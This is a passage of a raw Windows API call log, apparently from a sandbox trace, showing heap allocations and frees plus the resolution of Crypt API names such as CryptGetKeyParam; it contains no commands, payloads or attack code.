Flags=0x0, Size=0x8) returned 0x43e26f0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0124.076] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0124.076] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0124.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0124.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4550) returned 0x49aa010 [0124.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4550) returned 0x49b2ac0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0124.078] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0124.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0124.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0124.078] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0124.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0124.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0124.079] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0124.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0124.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0124.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0124.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0124.079] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.080] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0124.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0124.081] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0124.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0124.081] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0124.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0124.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0124.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0124.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0124.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0124.085] GetProcAddress 